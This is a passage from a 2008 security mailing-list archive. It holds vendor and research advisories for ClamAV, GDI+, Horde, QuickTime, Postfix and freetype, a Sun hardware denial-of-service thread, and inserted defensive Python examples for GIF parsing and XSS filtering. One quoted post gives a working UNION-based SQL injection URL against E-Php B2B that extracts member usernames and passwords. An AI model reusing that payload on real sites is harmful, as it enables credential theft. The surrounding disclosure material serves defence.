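    print(try_read(b"hello", 20))
```

Reading "up to CONTENT_LENGTH" is only safe once CONTENT_LENGTH itself has been bounded; the cap is what turns an unauthenticated POST from a memory-exhaustion vector into a rejected request.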


[ MDVSA-2008:189 ] clamav

2008-09-10 Thread security

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2008:189
 http://www.mandriva.com/security/
 ___

 Package : clamav
 Date: September 9, 2008
 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0
 ___

 Problem Description:

 Multiple vulnerabilities were discovered in ClamAV and corrected with
 the 0.94 release, including:
 
 A vulnerability in ClamAV's chm-parser allowed remote attackers to
 cause a denial of service (application crash) via a malformed CHM file
 (CVE-2008-1389).
 
 A vulnerability in libclamav would allow attackers to cause a
 denial of service via vectors related to an out-of-memory condition
 (CVE-2008-3912).
 
 Multiple memory leaks were found in ClamAV that could possibly allow
 attackers to cause a denial of service via excessive memory consumption
 (CVE-2008-3913).
 
 A number of unspecified vulnerabilities in ClamAV were reported that
 have an unknown impact and attack vectors related to file descriptor
 leaks (CVE-2008-3914).
 
 Other bugs have also been corrected in 0.94 which is being provided
 with this update.  Because this new version has increased the major
 of the libclamav library, updated dependent packages are also being
 provided.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1389
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3912
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3913
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3914
 ___

 Updated Packages:

 Mandriva Linux 2007.1:
 5a59d6fe5e4fc3dfeffa930bf1bfbade  2007.1/i586/clamav-0.94-1.1mdv2007.1.i586.rpm
 6699ae8d7a278a4546bd16b8edd92b80  2007.1/i586/clamav-db-0.94-1.1mdv2007.1.i586.rpm
 369affe714278781d07748aa9aa3282d  2007.1/i586/clamav-milter-0.94-1.1mdv2007.1.i586.rpm
 a34884b3416c7039bfe0307329a75469  2007.1/i586/clamd-0.94-1.1mdv2007.1.i586.rpm
 326099a42cc04963de5a4e6c32d9295e  2007.1/i586/klamav-0.44-1.1mdv2007.1.i586.rpm
 3dac3a08b8077d6367ca22bf9b8b5731  2007.1/i586/libclamav5-0.94-1.1mdv2007.1.i586.rpm
 329b46ef055ea610b9baa0a364cce0b0  2007.1/i586/libclamav-devel-0.94-1.1mdv2007.1.i586.rpm
 685aea74c200241fdf8ef9fc6f4e4e7b  2007.1/SRPMS/clamav-0.94-1.1mdv2007.1.src.rpm
 25b939eb3abfe70374edf4f314f7d2bc  2007.1/SRPMS/klamav-0.44-1.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 19b119eeae8187c820a56681ec003bd2  2007.1/x86_64/clamav-0.94-1.1mdv2007.1.x86_64.rpm
 44f1c6f2729a154a4d5b92b9b0185b37  2007.1/x86_64/clamav-db-0.94-1.1mdv2007.1.x86_64.rpm
 c4a07f4bd14120db422b196f32c491fe  2007.1/x86_64/clamav-milter-0.94-1.1mdv2007.1.x86_64.rpm
 4ac4af22079d824c87f83224bb0a5e0a  2007.1/x86_64/clamd-0.94-1.1mdv2007.1.x86_64.rpm
 577fa90a30d5b2f47fbd730bf6abcd1f  2007.1/x86_64/klamav-0.44-1.1mdv2007.1.x86_64.rpm
 7bcfa45a9c5b60eb9a1a6eac3a9e475c  2007.1/x86_64/lib64clamav5-0.94-1.1mdv2007.1.x86_64.rpm
 f2aaa85f2e0504a380dec20f644efecc  2007.1/x86_64/lib64clamav-devel-0.94-1.1mdv2007.1.x86_64.rpm
 685aea74c200241fdf8ef9fc6f4e4e7b  2007.1/SRPMS/clamav-0.94-1.1mdv2007.1.src.rpm
 25b939eb3abfe70374edf4f314f7d2bc  2007.1/SRPMS/klamav-0.44-1.1mdv2007.1.src.rpm

 Mandriva Linux 2008.0:
 07c42704f9eb9c8030f801f229304b3e  2008.0/i586/clamav-0.94-1.1mdv2008.0.i586.rpm
 5103d15263284af283399e0eeb71296a  2008.0/i586/clamav-db-0.94-1.1mdv2008.0.i586.rpm
 2cf2f1d21d5428c8a26a80d6a70e8a34  2008.0/i586/clamav-milter-0.94-1.1mdv2008.0.i586.rpm
 fc53823cb1b73eb75c008a3ebc21193a  2008.0/i586/clamd-0.94-1.1mdv2008.0.i586.rpm
 67b1edd4b40dbc10e3594e79a9016f0e  2008.0/i586/klamav-0.44-1.1mdv2008.0.i586.rpm
 779bd44fb23ab3d7c38a0ebef3382938  2008.0/i586/libclamav5-0.94-1.1mdv2008.0.i586.rpm
 2ec3fb577dc1da56af0481f197e2000d  2008.0/i586/libclamav-devel-0.94-1.1mdv2008.0.i586.rpm
 fff2dc6701ea1a7e458e0c7305d7c4b4  2008.0/SRPMS/clamav-0.94-1.1mdv2008.0.src.rpm
 790d1fafeb9d594a4ef8b0815f3262b2  2008.0/SRPMS/klamav-0.44-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 19a38a3e0dd4b8110978001c9e00983c  2008.0/x86_64/clamav-0.94-1.1mdv2008.0.x86_64.rpm
 7d656ec44f2bb5ff2b0fec6bafa7df70  2008.0/x86_64/clamav-db-0.94-1.1mdv2008.0.x86_64.rpm
 836b5f5b80d43e8deccc568c4ab13d29  2008.0/x86_64/clamav-milter-0.94-1.1mdv2008.0.x86_64.rpm
 3fcf6e4b59d7b7478f54293fcd2ee645  2008.0/x86_64/clamd-0.94-1.1mdv2008.0.x86_64.rpm
 2ce435e797aff93eaa669bddd07c80f5  2008.0/x86_64/klamav-0.44-1.1mdv2008.0.x86_64.rpm
 24e564b09aa2da8b990341faaaed48e7  2008.0/x86_64/lib64clamav5-0.94-1.1mdv2008.0.x86_64.rpm
 f3aad5e06843c9b3e2d02ad200061e0e  2008.0/x86_64/lib64clamav-devel-0.94-1.1mdv2008.0.x86_64.rpm
 fff2dc6701ea1a7e458e0c7305d7c4b4  2008.0/SRPMS/clamav

iDefense Security Advisory 09.09.08: Microsoft Windows GDI+ Gradient Fill Heap Overflow Vulnerability

2008-09-10 Thread iDefense Labs
iDefense Security Advisory 09.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Sep 09, 2008

I. BACKGROUND

The GDI+ library, or "GdiPlus.dll", provides access to a number of
graphics methods, via a class-based API. Vector Markup Language (VML)
is a component of the Extensible Markup Language (XML) that specifies
vector images (e.g., rectangles and ovals) using the GDI+ API. For more
information about these technologies, visit the following URLs.

http://msdn.microsoft.com/en-us/library/ms533797(VS.85).aspx
http://msdn.microsoft.com/en-us/library/ms533798(VS.85).aspx
http://www.w3.org/TR/1998/NOTE-VML-19980513
http://en.wikipedia.org/wiki/Vector_Markup_Language

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in multiple
versions of Microsoft Corp.'s GDI+ could allow an attacker to execute
arbitrary code within the context of the local user.

The vulnerability specifically exists in the memory allocation performed
by the GDI+ library. Certain malformed gradient fill input can cause the
application to corrupt the heap, potentially allowing arbitrary code
execution.

III. ANALYSIS

Exploitation of this vulnerability may allow an attacker to execute
arbitrary code in the context of the current user. To exploit this
vulnerability, the attacker would need to convince a targeted user to
render a document with an application that utilizes the vulnerable GDI+
functions. This could be accomplished by persuading the user to follow a
link, view a document, or read an e-mail message.

IV. DETECTION

iDefense Labs confirmed this vulnerability affects Internet Explorer 7
and Internet Explorer 6 on the Microsoft Windows XP SP2 platform. The
following versions of VGX.DLL were tested and found to be vulnerable:

  7.00.6000.20628
  7.00.6000.16386
  6.00.2900.3051
  6.00.2900.2997

While the VGX.DLL library (which handles VML) appears to be the most
likely vector, Microsoft have indicated to us that the GdiPlus.dll is
the root cause of the vulnerability. Version 5.1.3102.2180 of
GdiPlus.dll was installed on each of the tested systems.

V. WORKAROUND

In order to prevent exploitation of this vulnerability, unregister or
deny access to vgx.dll and/or gdiplus.dll. Note that doing so will
prevent proper rendering of documents that rely on the affected
component.

VI. VENDOR RESPONSE

Microsoft has officially addressed this vulnerability with Security
Bulletin MS08-052. For more information, consult their bulletin at the
following URL.

http://www.microsoft.com/technet/security/bulletin/ms08-052.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5348 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/09/2007  Initial vendor notification
05/09/2007  Initial vendor response
09/09/2008  Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by Greg MacManus during his tenure
with iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.


Windows GDI+ GIF memory corruption

2008-09-10 Thread Ivan Fratric
There is a memory corruption vulnerability with GIF file processing in
Microsoft GDI+ that can be used to crash a vulnerable application and
potentially execute arbitrary code.

#The vulnerability#

The vulnerability is caused due to improper handling of graphic
control extension when processing malformed GIF files. The
vulnerability can be triggered if a large number of extension markers
(0x21) followed by unknown labels is found when processing a GIF file.


#Impact#


This vulnerability can be used to corrupt memory of any application
utilizing GDI+ for GIF file decoding if it is used to open a malformed
GIF file. This could lead to code execution with the privileges of the
user running the vulnerable application.


#References#


http://ifsec.blogspot.com/2008/09/windows-gdi-gif-memory-corruption.html
http://www.zerodayinitiative.com/advisories/ZDI-08-056/
http://www.microsoft.com/technet/security/bulletin/ms08-052.mspx
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3013
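An added illustration, not GDI+ code or the post author's, of how a decoder should treat the extension-marker sequence described above: every length is bounds-checked before use, unknown labels are skipped as opaque sub-block chains rather than handled specially, and an explicit cap on extension blocks (the cap value is this example's own choice; the GIF format sets none) bounds the work a malformed file can demand. The sample GIF bytes are constructed here, not taken from any real file.

```python
"""Defensive walk of a GIF block stream: lengths are bounds-checked, unknown
extension labels are skipped as opaque sub-block chains, extension count is capped."""
import struct

GIF_EXTENSION, GIF_IMAGE, GIF_TRAILER = 0x21, 0x2C, 0x3B
GCE_LABEL = 0xF9   # Graphic Control Extension: fixed 4-byte block

class GifFormatError(ValueError):
    """Truncated, oversized or structurally invalid input."""

def _need(data, pos, n):
    # Refuse to read past the end of the buffer.
    if pos + n > len(data):
        raise GifFormatError("truncated at offset %d, need %d bytes" % (pos, n))

def _skip_sub_blocks(data, pos):
    """Walk <len><bytes>... until a zero-length block. Label-independent, so an
    unknown extension cannot desynchronise the parser."""
    while True:
        _need(data, pos, 1)
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        _need(data, pos, n)
        pos += n

def scan_gif(data, max_extensions=64):
    """Return [(label, byte_count), ...] for each extension block, or raise."""
    _need(data, 0, 13)
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise GifFormatError("bad signature")
    flags, pos = data[10], 13
    if flags & 0x80:                           # global colour table present
        table = 3 * (2 << (flags & 7))         # 3 bytes x 2^(N+1) entries
        _need(data, pos, table)
        pos += table
    extensions = []
    while True:
        _need(data, pos, 1)
        introducer = data[pos]
        pos += 1
        if introducer == GIF_TRAILER:
            return extensions
        if introducer == GIF_EXTENSION:
            if len(extensions) >= max_extensions:
                raise GifFormatError("more than %d extension blocks" % max_extensions)
            _need(data, pos, 1)
            label, start = data[pos], pos + 1
            if label == GCE_LABEL:
                _need(data, start, 1)
                if data[start] != 4:
                    raise GifFormatError("GCE block size %d, expected 4" % data[start])
            pos = _skip_sub_blocks(data, start)    # known or unknown label alike
            extensions.append((label, pos - start))
        elif introducer == GIF_IMAGE:
            _need(data, pos, 9)
            iflags = data[pos + 8]
            pos += 9
            if iflags & 0x80:                      # local colour table present
                table = 3 * (2 << (iflags & 7))
                _need(data, pos, table)
                pos += table
            _need(data, pos, 1)                    # LZW minimum code size
            pos = _skip_sub_blocks(data, pos + 1)  # compressed image data
        else:
            raise GifFormatError("unknown block introducer 0x%02x" % introducer)

def rejects(data):
    try:
        scan_gif(data)
        return False
    except GifFormatError:
        return True

# Constructed sample (not a real file): 1x1 GIF89a, one GCE, one unknown-label (0x42) extension.
HEADER = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x00, 0, 0)
GCE = b"\x21\xf9\x04\x00\x00\x00\x00\x00"
UNKNOWN_EXT = b"\x21\x42\x03abc\x00"
IMAGE = b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0) + b"\x02\x02\x44\x01\x00"
SAMPLE_GIF = HEADER + GCE + UNKNOWN_EXT + IMAGE + b"\x3b"
FLOOD_GIF = HEADER + UNKNOWN_EXT * 200 + IMAGE + b"\x3b"  # many 0x21/unknown pairs
```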


[oCERT-2008-012] Horde, Popoon frameworks common input sanitization errors (XSS)

2008-09-10 Thread Will Drewry

#2008-012 Horde, Popoon frameworks common input sanitization errors (XSS)

Two cross-site scripting (XSS) vulnerabilities were reported in the Horde
Framework. The first is that the Horde framework fails to properly
sanitize the filename of MIME attachments on received emails.  The second
vulnerability has a wider impact.

Horde relies on code similar to Popoon's externalinput.php to filter out
potential XSS attacks on user-supplied input.  This filter, and the original,
fail to fully sanitize user data.  In particular, this filter fails to
protect against '/'s acting as spaces in both Microsoft Internet Explorer and
Mozilla Firefox.

Patches have been made available for Horde:

* 3.1:
  http://ocert.org/patches/2008-012/Text_Filter.31.patch
* 3.2 - CVS HEAD:
  http://ocert.org/patches/2008-012/MIME.patch
  http://ocert.org/patches/2008-012/Text_Filter.patch

A replacement for externalinput.php is linked below as well.


Affected version:

Popoon (externalinput.php) <= r22196

Horde >= 3.2, <= 3.2.1 (both issues)
Horde >= 3.1, <  3.2   (XSS filter only)

(secondary affected versions)

Horde Groupware >= 1.0, <= 1.0.6 (XSS filter only)
Horde Groupware Webmail Edition >= 1.0, <= 1.0.7 (XSS filter only)
Horde Groupware >= 1.1, <= 1.1.2 (both issues)
Horde Groupware Webmail Edition >= 1.1, <= 1.1.2 (both issues)
Cake-PHP <= 1.2.0.7296 RC2
phpMyFAQ <= 2.5.0-dev (2008-08-18)
deluxeBB <= 1.2
emucms <= 0.3
SimpleSite <= 1.6.4
RevokeBB <= 1.0RC11_normal
TPLN <= 2.9
Logicoder <= r27
phour <= r106
MDPro <= 1.0821
noserub <= r784/0.6


Fixed version:

Horde > 3.2.1 (see patches)

externalinput/clean.php (see links)


Credit: Vulnerability report and proof of concepts received from
Alexios Fakos.


CVE: CVE-2008-3823 (MIME attachment), CVE-2008-3824 (XSS filtering)


Timeline:
2008-08-05: initial report and proof of concepts received.
2008-08-18: affected software survey completed by oCERT.
2008-08-18: externalinput.php/Popoon author contacted.
2008-08-19: Horde author contacted.
2008-08-19: initial patches for Horde and Popoon supplied by vendors.
2008-08-19: reporter calls out additional possible vectors in externalinput.php.
2008-08-20: secondary fix for externalinput.php supplied.
2008-08-20: attempted to contact CakePHP.
2008-09-04: final Horde patches supplied.
2008-09-04: potentially affected oCERT members and vendor-sec notified.
2008-08-05: CVEs assigned.
2008-09-05: oCERT requests end of embargo to be Sep 10, 1700 UTC.
2008-09-06: contacted phlymail lite; confirmed unaffected.
2008-09-06: notified all secondary vendors above.
2008-09-06: acknowledgement from cakephp, noserub, phpmyfaq.
2008-09-09: confirmed exact embargo end with vendor-sec and other vendors.
2008-09-10: advisory released.

References:
http://blog.liip.ch/archive/2005/01/16/xss-how-we-try-to-prevent-it.html
http://blog.liip.ch/missed-case-in-externalinput-php-resulting-in-viable-xss-attacks.html

Links:
http://horde.org
http://svn.bitflux.ch/repos/public/popoon/trunk/classes/externalinput.php
https://svn.liip.ch/repos/public/ext/externalinput/trunk/lx/externalinput/clean.php
http://horde.org/groupware
http://www.cakephp.org
http://www.phpmyfaq.de
http://www.deluxebb.com
http://www.emusoft.org/index.php?page=category&cat_id=14
http://dev.mistralys.com/SimpleSite
http://sourceforge.net/projects/revokebb
http://tpln.h2lsoft.com/
http://code.google.com/p/logicoder/
http://code.google.com/p/phour/
http://www.maxdev.com/AboutMD.phtml
http://code.google.com/p/noserub/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3823
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3824

Permalink:
http://www.ocert.org.org/advisories/ocert-2008-012.html


--
Will Drewry <[EMAIL PROTECTED]>
oCERT Team :: http://ocert.org
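An added illustration of the separator problem described in the advisory above. This is not Popoon's externalinput.php or Horde's filter; the naive variant stands in for any filter that only recognises whitespace before an attribute name, and the hardened variant treats '/' as the same boundary the browser does while leaving quoted values (and the slashes in URLs) intact. Inputs and the inert handler name are constructed.

```python
"""Attribute-boundary aware scan for inline event handlers. A filter that
recognises only whitespace as the separator before an attribute misses the
'/' that IE and Firefox also accept; the hardened scan treats both."""
import re

TAG = re.compile(r"<([A-Za-z][^>]*)>")
WHITESPACE = " \t\r\n\f"
WHITESPACE_OR_SLASH = WHITESPACE + "/"

def _tokens(body, separators):
    """Split the inside of a tag on `separators`, keeping quoted values intact
    so a '/' inside href="http://host/path" is never taken as a boundary."""
    tokens, cur, quote = [], [], None
    for ch in body:
        if quote:
            cur.append(ch)
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
            cur.append(ch)
        elif ch in separators:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens

def event_handlers(html, separators=WHITESPACE_OR_SLASH):
    """Return the names of on* attributes found in any tag of `html`."""
    found = []
    for m in TAG.finditer(html):
        tokens = _tokens(m.group(1), separators)
        for attr in tokens[1:]:                    # tokens[0] is the tag name
            name = attr.split("=", 1)[0].lower()
            if name.startswith("on"):
                found.append(name)
    return found

def naive_event_handlers(html):
    """The weak variant: whitespace is the only recognised separator."""
    return event_handlers(html, WHITESPACE)

# Constructed inputs (not from the advisory): the second replaces the spaces the
# naive filter depends on with '/'; the handler body h() is inert.
PLAIN = '<img src="x" onerror="h()">'
SLASHED = '<img/src="x"/onerror="h()">'
BENIGN = '<a href="http://example.test/a/b">link</a>'
```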


Re: E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability

2008-09-10 Thread packet
Already discovered:

http://packetstormsecurity.org/0809-exploits/ephpb2b-sql.txt
cceb7b553c51129e88d5553fdcb5129d E-PHP B2B Trading Marketplace Scripts suffers
from a remote SQL injection vulnerability in listings.php.  Homepage: http://www.darkc0de.com/.
Authored By r45c4l <r45c4l[at]hotmail.com>

On Wed, Sep 10, 2008 at 03:07:37PM +0300, hussin x wrote:
> |___|
> |
> | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability
> |
> |___
> |-Hussin X--|
> |
> |Author: Hussin X
> |
> |Home :  WwW.Hussin-X.CoM   |  www.tryag.cc/cc
> |
> |email:  darkangel_g85[at]Yahoo[DoT]com
> |
> |
> |
> |___
> |   |
> |
> | script : http://www.ephpscripts.com
> |
> |___|
> 
> Exploit:
> 
> 
> 
> www.[target].com/Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members
> --
> 
> 
> 
> 
> 
> 
> 
> L!VE DEMO: :
> 
> INFO
> 
> http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members
> --
> 
> 
> 
> http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members
> --
> 
> 
> 
> 
> 
> 
> 
> ( Greetz )_
> |
> |All members of the Forum  WwW.Hussin-X.CoM  |
> WwW.TrYaG.CC 
> |
> | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
> |
> |  Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori
> |__
> 
> 
>  Im IRAQi




Re: Sun M-class hardware denial of service

2008-09-10 Thread Florian Weimer
* Theo de Raadt:

> That is WRONG.  The long-term uptime of all other domains on the
> machine are eventually impacted because the entire physical machine
> must, after a service call to Sun, eventually be powered down.
>
> Management eventually has to decide to impact the SLA's of all domains.
> That means that Sun's promise of isolation is bunk.

The recovery strategy leaves something to be desired, true.  It's
certainly a bug.  I doubt it makes a difference whether it's labeled as
a security bug or not.

I don't want to downplay your frustration, but the pattern is fairly
common: When someone tries to port a new operating system to some
partitioning system, it's not totally unheard of that the new code takes
down (parts of) the system beyond the assigned partition.

> How absolutely bizarre.  Basically you spend half a million dollars on
> Sun hardware, and it isn't required to do this better than VMWare?

I think you've got it exactly backwards: you don't let non-trusted
people run code on these machines because they are so expensive.

> If an OS running inside VMWare was able to cause a situation making it
> necessary to reboot the host environment and restart all VMWare
> instances, it would be considered a very serious and significant
> security problem for VMWare.

Are you sure about this?  Separation of virtual machines as if they were
real machines is not listed in the data sheet, and is not covered in the
security-related part of their website, either.

I'm sure they will fix bugs within their responsibility, but as a
software vendor, they can only do so much about certain types of crasher
bugs.  I may have missed some promises, but I doubt they make any hard
guarantees (like money-back if lack of separation is demonstrated).


[ MDVSA-2008:190 ] postfix

2008-09-10 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2008:190
 http://www.mandriva.com/security/
 ___

 Package : postfix
 Date: September 10, 2008
 Affected: 2008.0, 2008.1
 ___

 Problem Description:

 A vulnerability in Postfix 2.4 and later was discovered, when
 running on Linux kernel 2.6, where a local user could cause a denial
 of service due to Postfix leaking the epoll file descriptor when
 executing non-Postfix commands (CVE-2008-3889).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3889
 http://www.postfix.org/announcements/20080902.html
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



[SECURITY] [DSA 1635-1] New freetype packages fix multiple vulnerabilities

2008-09-10 Thread Steve Kemp
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1635-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
September 10, 2008   http://www.debian.org/security/faq
- 

Package: freetype
Vulnerability  : multiple
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2008-1806 CVE-2008-1807 CVE-2008-1808

Several local vulnerabilities have been discovered in freetype,
a FreeType 2 font engine, which could allow the execution of arbitrary
code.

The Common Vulnerabilities and Exposures project identifies the
following problems:

CVE-2008-1806
An integer overflow allows context-dependent attackers to execute
arbitrary code via a crafted set of values within the Private
dictionary table in a Printer Font Binary (PFB) file.

CVE-2008-1807
The handling of an invalid "number of axes" field in the PFB file could
trigger the freeing of arbitrary memory locations, leading to
memory corruption.

CVE-2008-1808
Multiple off-by-one errors allowed the execution of arbitrary code
via malformed tables in PFB files, or invalid SHC instructions in
TTF files.


For the stable distribution (etch), these problems have been fixed in version
2.2.1-5+etch3.

For the unstable distribution (sid), these problems have been fixed in
version 2.3.6-1.

We recommend that you upgrade your freetype package.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  

Re: Sun M-class hardware denial of service

2008-09-10 Thread terry white
... ciao:

:  on "9-9-2008" "B 650" writ:
: I think it's a bit of a leap to call this a DoS vulnerability.
: The power cycle of the remainder of the frame can be done at your leisure

which, convenient if nothing else, still has to be done.  so, at some
point, "all" 'mission critical applications', are forced to fail.  'when'
a "DOS" happens, does not change its essential nature ...

-- 
... i'm a man, but i can change,
if i have to , i guess ...



ZDI-08-057: Apple QuickTime IV32 Codec Parsing Stack Overflow Vulnerability

2008-09-10 Thread zdi-disclosures
ZDI-08-057: Apple QuickTime IV32 Codec Parsing Stack Overflow 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-057
September 9, 2008

-- CVE ID:
CVE-2008-3635

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the parsing of QuickTime files that
utilize the Indeo video codec. A lack of proper bounds checking within
QuickTimeInternetExtras.qtx can result in a stack based buffer overflow
leading to arbitrary code execution under the context of the currently
logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT3027

-- Disclosure Timeline:
2008-08-19 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]